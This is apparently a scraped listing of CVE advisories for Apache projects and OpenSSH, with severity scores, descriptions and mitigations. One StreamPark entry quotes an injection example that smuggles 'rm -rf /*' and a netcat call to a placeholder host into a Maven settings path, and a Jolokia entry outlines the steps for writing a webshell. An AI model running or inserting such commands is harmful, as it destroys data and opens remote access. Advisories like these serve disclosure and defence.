CVE-2023-29055 7.5 - High - January 29, 2024

In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials. To avoid this threat, users are recommended to  * Always turn on HTTPS so that network payload is encrypted. * Avoid putting credentials in kylin.properties, or at least not in plain text. * Use network firewalls to protect the serverside such that it is not accessible to external attackers. * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.

Insufficiently Protected Credentials

Apache Airflow, versions before 2.8.1, have a vulnerability

CVE-2023-50944 6.5 - Medium - January 24, 2024

Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.


Apache Airflow, versions before 2.8.1, have a vulnerability

CVE-2023-50943 7.5 - High - January 24, 2024

Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of "enable_xcom_pickling=False" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.

Marshaling, Unmarshaling

Since version 5.2.0

CVE-2023-51702 6.5 - Medium - January 24, 2024

Since version 5.2.0, when using deferrable mode with the path of a Kubernetes configuration file for authentication, the Airflow worker serializes this configuration file as a dictionary and sends it to the triggerer by storing it in metadata without any encryption. Additionally, if used with an Airflow version between 2.3.0 and 2.6.0, the configuration dictionary will be logged as plain text in the triggerer service without masking. This allows anyone with access to the metadata or triggerer log to obtain the configuration file and use it to access the Kubernetes cluster. This behavior was changed in version 7.0.0, which stopped serializing the file contents and started providing the file path instead to read the contents into the trigger. Users are recommended to upgrade to version 7.0.0, which fixes this issue.

Insertion of Sensitive Information into Log File

A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3

CVE-2023-49657 5.4 - Medium - January 23, 2024

A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS. For 2.X versions, users should change their config to include: TALISMAN_CONFIG = {     "content_security_policy": {         "base-uri": ["'self'"],         "default-src": ["'self'"],         "img-src": ["'self'", "blob:", "data:"],         "worker-src": ["'self'", "blob:"],         "connect-src": [             "'self'",             " https://api.mapbox.com" https://api.mapbox.com" ;,             " https://events.mapbox.com" https://events.mapbox.com" ;,         ],         "object-src": "'none'",         "style-src": [             "'self'",             "'unsafe-inline'",         ],         "script-src": ["'self'", "'strict-dynamic'"],     },     "content_security_policy_nonce_in": ["script-src"],     "force_https": False,     "session_cookie_secure": False, }


Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat:

CVE-2024-21733 5.3 - Medium - January 19, 2024

Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.

Generation of Error Message Containing Sensitive Information

Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2

CVE-2023-46226 9.8 - Critical - January 15, 2024

Remote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr

CVE-2023-50290 6.5 - Medium - January 15, 2024

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host, unlike Java system properties which are set per-Java-proccess. The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization setup will only be vulnerable via users with the "metrics-read" permission. This issue affects Apache Solr: from 9.0.0 before 9.3.0. Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.

Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack

CVE-2023-46749 6.5 - Medium - January 15, 2024

Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).

Directory traversal

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer

CVE-2023-49619 3.1 - Low - January 10, 2024

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.0. Under normal circumstances, a user can only bookmark a question once, and will only increase the number of questions bookmarked once. However, repeat submissions through the script can increase the number of collection of the question many times. Users are recommended to upgrade to version [1.2.1], which fixes the issue.

Race Condition

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis

CVE-2023-51441 7.2 - High - January 06, 2024

** UNSUPPORTED WHEN ASSIGNED ** Improper Input Validation vulnerability in Apache Axis allowed users with access to the admin service to perform possible SSRF This issue affects Apache Axis: through 1.3. As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. Alternatively you could use a build of Axis with the patch from https://github.com/apache/axis-axis1-java/commit/685c309febc64aa393b2d64a05f90e7eb9f73e06 applied. The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.


Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong:

CVE-2023-51785 7.5 - High - January 03, 2024

Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.7.0 through 1.9.0, the attackers can make a arbitrary file read attack using mysql driver. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it. [1]  https://github.com/apache/inlong/pull/9331

Marshaling, Unmarshaling

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong:

CVE-2023-51784 9.8 - Critical - January 03, 2024

Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9329

Code Injection

Improper Input Validation vulnerability in Apache DolphinScheduler

CVE-2023-49299 8.8 - High - December 30, 2023

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server.This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue.

Improper Input Validation

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments

CVE-2023-47804 8.8 - High - December 29, 2023

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502.

Argument Injection

The vulnerability permits attackers to circumvent authentication processes

CVE-2023-51467 9.8 - Critical - December 26, 2023

The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code


Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations

CVE-2023-50968 7.5 - High - December 26, 2023

Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.


Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4

CVE-2023-51656 9.8 - Critical - December 21, 2023

Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4. Users are recommended to upgrade to version 1.2.2, which fixes the issue.

Marshaling, Unmarshaling

Apache Airflow, versions before 2.8.0, is affected by a vulnerability

CVE-2023-50783 6.5 - Medium - December 21, 2023

Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable. This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification. Users are recommended to upgrade to 2.8.0, which fixes this issue


Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability

CVE-2023-49920 6.5 - Medium - December 21, 2023

Apache Airflow, version 2.7.0 through 2.7.3, has a vulnerability that allows an attacker to trigger a DAG in a GET request without CSRF validation. As a result, it was possible for a malicious website opened in the same browser - by the user who also had Airflow UI opened - to trigger the execution of DAGs without the user's consent. Users are advised to upgrade to version 2.8.0 or later which is not affected

Session Riding

Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability

CVE-2023-48291 4.3 - Medium - December 21, 2023

Apache Airflow, in versions prior to 2.8.0, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. This is a missing fix for CVE-2023-42792 in Apache Airflow 2.7.2  Users of Apache Airflow are strongly advised to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability.

Exposure of Resource to Wrong Sphere

Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability

CVE-2023-47265 5.4 - Medium - December 21, 2023

Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users. Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability


Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy

CVE-2023-37544 7.5 - High - December 20, 2023

Improper Authentication vulnerability in Apache Pulsar WebSocket Proxy allows an attacker to connect to the /pingpong endpoint without authentication. This issue affects Apache Pulsar WebSocket Proxy: from 2.8.0 through 2.8.*, from 2.9.0 through 2.9.*, from 2.10.0 through 2.10.4, from 2.11.0 through 2.11.1, 3.0.0. The known risks include a denial of service due to the WebSocket Proxy accepting any connections, and excessive data transfer due to misuse of the WebSocket ping/pong feature. 2.10 Pulsar WebSocket Proxy users should upgrade to at least 2.10.5. 2.11 Pulsar WebSocket Proxy users should upgrade to at least 2.11.2. 3.0 Pulsar WebSocket Proxy users should upgrade to at least 3.0.1. 3.1 Pulsar WebSocket Proxy users are unaffected. Any users running the Pulsar WebSocket Proxy for 2.8, 2.9, and earlier should upgrade to one of the above patched versions.


Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow

CVE-2023-43826 8.8 - High - December 19, 2023

Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue.

Integer Overflow or Wraparound

An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts

CVE-2023-49734 6.5 - Medium - December 19, 2023

An authenticated Gamma user has the ability to create a dashboard and add charts to it, this user would automatically become one of the owners of the charts allowing him to incorrectly have write permissions to these charts.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2 or 2.1.3, which fixes the issue.


Uncontrolled resource consumption can be triggered by authenticated attacker

CVE-2023-46104 6.5 - Medium - December 19, 2023

Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.

Resource Exhaustion

A where_in JINJA macro

CVE-2023-49736 8.8 - High - December 19, 2023

A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

SQL Injection

The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such

CVE-2023-48795 5.9 - Medium - December 18, 2023

The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.

Improper Validation of Integrity Check Value

The api /api/snapshot and /api/get_log_file would allow unauthenticated access

CVE-2023-41314 8.2 - High - December 18, 2023

The api /api/snapshot and /api/get_log_file would allow unauthenticated access. It could allow a DoS attack or get arbitrary files from FE node. Please upgrade to 2.0.3 to fix these issues.


In streampark, there is a project module that integrates Maven's compilation capability

CVE-2023-49898 7.2 - High - December 15, 2023

In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

Command Injection

In the Streampark platform

CVE-2023-30867 4.9 - Medium - December 15, 2023

In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

SQL Injection

Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5

CVE-2023-46279 9.8 - Critical - December 15, 2023

Deserialization of Untrusted Data vulnerability in Apache Dubbo.This issue only affects Apache Dubbo 3.1.5. Users are recommended to upgrade to the latest version, which fixes the issue.

Marshaling, Unmarshaling

A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo:

CVE-2023-29234 9.8 - Critical - December 15, 2023

A deserialization vulnerability existed when decode a malicious package.This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.

Marshaling, Unmarshaling

URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro

CVE-2023-46750 6.1 - Medium - December 14, 2023

URL Redirection to Untrusted Site ('Open Redirect') vulnerability when "form" authentication is used in Apache Shiro. Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+.

Open Redirect

Design document functions

CVE-2023-45725 5.7 - Medium - December 13, 2023

Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: *   list *   show *   rewrite *   update An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a _local document with an "update" function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Workaround: Avoid using design documents from untrusted sources which may attempt to access or manipulate request object's headers

An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file

CVE-2023-50164 9.8 - Critical - December 07, 2023

An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. Users are recommended to upgrade to versions Struts 2.5.33 or Struts or greater to fix this issue.

Files or Directories Accessible to External Parties

When a Multipart request is performed but some of the fields exceed the maxStringLength  limit

CVE-2023-41835 7.5 - High - December 05, 2023

When a Multipart request is performed but some of the fields exceed the maxStringLength  limit, the upload files will remain in struts.multipart.saveDir  even if the request has been denied. Users are recommended to upgrade to versions Struts 2.5.32 or or Struts or greater, which fixe this issue.

Insufficient Cleanup

Pre-auth RCE in Apache Ofbiz 18.12.09

CVE-2023-49070 9.8 - Critical - December 05, 2023

Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.  Users are recommended to upgrade to version 18.12.10

Code Injection

** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files

CVE-2023-49735 7.5 - High - November 30, 2023

** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled data to this key may be relatively common, as it was also used like that to set the language in the 'tiles-test' application shipped with Tiles. This issue affects Apache Tiles from version 2 onwards. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Directory traversal

Improper Restriction of XML External Entity Reference vulnerability in Apache Cocoon.This issue affects Apache Cocoon:

CVE-2023-49733 9.8 - Critical - November 30, 2023

Improper Restriction of XML External Entity Reference vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.


Before DolphinScheduler version 3.1.0, the login user could delete UDF function in the resource center unauthorized (

CVE-2023-49620 6.5 - Medium - November 30, 2023

Before DolphinScheduler version 3.1.0, the login user could delete UDF function in the resource center unauthorized (which almost used in sql task), with unauthorized access vulnerability (IDOR), but after version 3.1.0 we fixed this issue. We mark this cve as moderate level because it still requires user login to operate, please upgrade to version 3.1.0 to avoid this vulnerability


Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Cocoon.This issue affects Apache Cocoon:

CVE-2022-45135 9.8 - Critical - November 30, 2023

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Cocoon.This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

An authenticated malicious user could initiate multiple concurrent requests

CVE-2023-42504 6.5 - Medium - November 28, 2023

An authenticated malicious user could initiate multiple concurrent requests, each requesting multiple dashboard exports, leading to a possible denial of service. This issue affects Apache Superset: before 3.0.0

Allocation of Resources Without Limits or Throttling

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site by spoofing the HTTP Host header, users could be redirected to this site when clicking on

CVE-2023-42502 5.4 - Medium - November 28, 2023

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site by spoofing the HTTP Host header, users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset versions before 3.0.0.

Open Redirect

An authenticated user with read permissions on database connections metadata could potentially access sensitive information such as the connection's username

CVE-2023-42505 4.3 - Medium - November 28, 2023

An authenticated user with read permissions on database connections metadata could potentially access sensitive information such as the connection's username. This issue affects Apache Superset before 3.0.0.

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution

CVE-2022-41678 8.8 - High - November 28, 2023

Once an user is authenticated on Jolokia, he can potentially trigger arbitrary code execution.  In details, in ActiveMQ configurations, jetty allows org.jolokia.http.AgentServlet to handler request to /api/jolokia org.jolokia.http.HttpRequestHandler#handlePostRequest is able to create JmxRequest through JSONObject. And calls to org.jolokia.http.HttpRequestHandler#executeRequest. Into deeper calling stacks, org.jolokia.handler.ExecHandler#doHandleRequest can be invoked through refection. This could lead to RCE through via various mbeans. One example is unrestricted deserialization in jdk.management.jfr.FlightRecorderMXBeanImpl which exists on Java version above 11. 1 Call newRecording. 2 Call setConfiguration. And a webshell data hides in it. 3 Call startRecording. 4 Call copyTo method. The webshell will be written to a .jsp file. The mitigation is to restrict (by default) the actions authorized on Jolokia, or disable Jolokia. A more restrictive Jolokia configuration has been defined in default ActiveMQ distribution. We encourage users to upgrade to ActiveMQ distributions version including updated Jolokia configuration: 5.16.6, 5.17.4, 5.18.0, 6.0.0.


Improper Input Validation vulnerability in Apache Tomcat.Tomcat

CVE-2023-46589 7.5 - High - November 28, 2023

Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.

HTTP Request Smuggling

Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface

CVE-2023-49145 5.4 - Medium - November 27, 2023

Apache NiFi 0.7.0 through 1.23.2 include the JoltTransformJSON Processor, which provides an advanced configuration user interface that is vulnerable to DOM-based cross-site scripting. If an authenticated user, who is authorized to configure a JoltTransformJSON Processor, visits a crafted URL, then arbitrary JavaScript code can be executed within the session context of the authenticated user. Upgrading to Apache NiFi 1.24.0 or 2.0.0-M1 is the recommended mitigation.


Unnecessary read permissions within the Gamma role would allow authenticated users to read configured CSS templates and annotations

CVE-2023-42501 4.3 - Medium - November 27, 2023

Unnecessary read permissions within the Gamma role would allow authenticated users to read configured CSS templates and annotations. This issue affects Apache Superset: before 2.1.2. Users should upgrade to version or above 2.1.2 and run `superset init` to reconstruct the Gamma role or remove `can_read` permission from the mentioned resources.

Incorrect Default Permissions

Improper payload validation and an improper REST API response type

CVE-2023-43701 5.4 - Medium - November 27, 2023

Improper payload validation and an improper REST API response type, made it possible for an authenticated malicious actor to store malicious code into Chart's metadata, this code could get executed if a user specifically accesses a specific deprecated API endpoint. This issue affects Apache Superset versions prior to 2.1.2.  Users are recommended to upgrade to version 2.1.2, which fixes this issue.


Improper authorization check and possible privilege escalation on Apache Superset up to but excluding 2.1.2

CVE-2023-40610 8.8 - High - November 27, 2023

Improper authorization check and possible privilege escalation on Apache Superset up to but excluding 2.1.2. Using the default examples database connection that allows access to both the examples schema and Apache Superset's metadata database, an attacker using a specially crafted CTE SQL statement could change data on the metadata database. This weakness could result on tampering with the authentication/authorization data.


Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler.This issue affects Apache DolphinScheduler: before 3.2.1

CVE-2023-49068 7.5 - High - November 27, 2023

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler.This issue affects Apache DolphinScheduler: before 3.2.1. Users are recommended to upgrade to version 3.2.1, which fixes the issue. At the time of disclosure of this advisory, this version has not yet been released. In the mean time, we recommend you make sure the logs are only available to trusted operators.

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler

CVE-2023-48796 7.5 - High - November 24, 2023

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache DolphinScheduler. The information exposed to unauthorized actors may include sensitive data such as database credentials. Users who can't upgrade to the fixed version can also set environment variable `MANAGEMENT_ENDPOINTS_WEB_EXPOSURE_INCLUDE=health,metrics,prometheus` to workaround this, or add the following section in the `application.yaml` file ``` management:   endpoints:     web:       exposure:         include: health,metrics,prometheus ``` This issue affects Apache DolphinScheduler: from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.

On unix-like systems, the temporary directory is shared between all user

CVE-2023-43123 5.5 - Medium - November 23, 2023

On unix-like systems, the temporary directory is shared between all user. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern MacOS Operating Systems. The method File.createTempFile on unix-like systems creates a file with predefined name (so easily identifiable) and by default will create this file with the permissions -rw-r--r--. Thus, if sensitive information is written to this file, other local users can read this information. File.createTempFile(String, String) will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. This affects the class  https://github.com/apache/storm/blob/master/storm-core/src/jvm/org/apache/storm/utils/TopologySpoutLag.java#L99  and was introduced by  https://issues.apache.org/jira/browse/STORM-3123 In practice, this has a very limited impact as this class is used only if ui.disable.spout.lag.monitoring is set to false, but its value is true by default. Moreover, the temporary file gets deleted soon after its creation. The solution is to use  Files.createTempFile https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/nio/file/Files.html#createTempFile(java.lang.String,java.lang.String,java.nio.file.attribute.FileAttribute...)  instead. We recommend that all users upgrade to the latest version of Apache Storm.

Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in

CVE-2023-37924 9.8 - Critical - November 22, 2023

Apache Software Foundation Apache Submarine has an SQL injection vulnerability when a user logs in. This issue can result in unauthorized login. Now we have fixed this issue and now user must have the correct login to access workbench. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. We recommend that all submarine users with 0.7.0 upgrade to 0.8.0, which not only fixes the issue, supports the oidc authentication mode, but also removes the case of unauthenticated logins. If using the version lower than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1037 https://github.com/apache/submarine/pull/1054 and rebuild the submarine-server image to fix this.

A cleverly devised username might bypass LDAP authentication checks

CVE-2022-46337 9.8 - Critical - November 20, 2023

A cleverly devised username might bypass LDAP authentication checks. In LDAP-authenticated Derby installations, this could let an attacker fill up the disk by creating junk Derby databases. In LDAP-authenticated Derby installations, this could also allow the attacker to execute malware which was visible to and executable by the account which booted the Derby server. In LDAP-protected databases which weren't also protected by SQL GRANT/REVOKE authorization, this vulnerability could also let an attacker view and corrupt sensitive data and run sensitive database functions and procedures. Mitigation: Users should upgrade to Java 21 and Derby Alternatively, users who wish to remain on older Java versions should build their own Derby distribution from one of the release families to which the fix was backported: 10.16, 10.15, and 10.14. Those are the releases which correspond, respectively, with Java LTS versions 17, 11, and 8.


Apache Software Foundation Apache Submarine has a bug when serializing against yaml

CVE-2023-46302 9.8 - Critical - November 20, 2023

Apache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 . Apache Submarine uses JAXRS to define REST endpoints. In order to handle YAML requests (using application/yaml content-type), it defines a YamlEntityProvider entity provider that will process all incoming YAML requests. In order to unmarshal the request, the readFrom method is invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`. We have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`. This issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue. If using the version smaller than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1054 and rebuild the submart-server image to fix this.

Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux

CVE-2023-26031 7.5 - High - November 16, 2023

Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges. Hadoop 3.3.0 updated the " YARN Secure Containers https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html " to add a feature for executing user-submitted applications in isolated linux containers. The native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs. The patch " YARN-10495 https://issues.apache.org/jira/browse/YARN-10495 . make the rpath of container-executor configurable" modified the library loading path for loading .so files from "$ORIGIN/" to ""$ORIGIN/:../lib/native/". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root. If the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges. The fix for the vulnerability is to revert the change, which is done in YARN-11441 https://issues.apache.org/jira/browse/YARN-11441 , "Revert 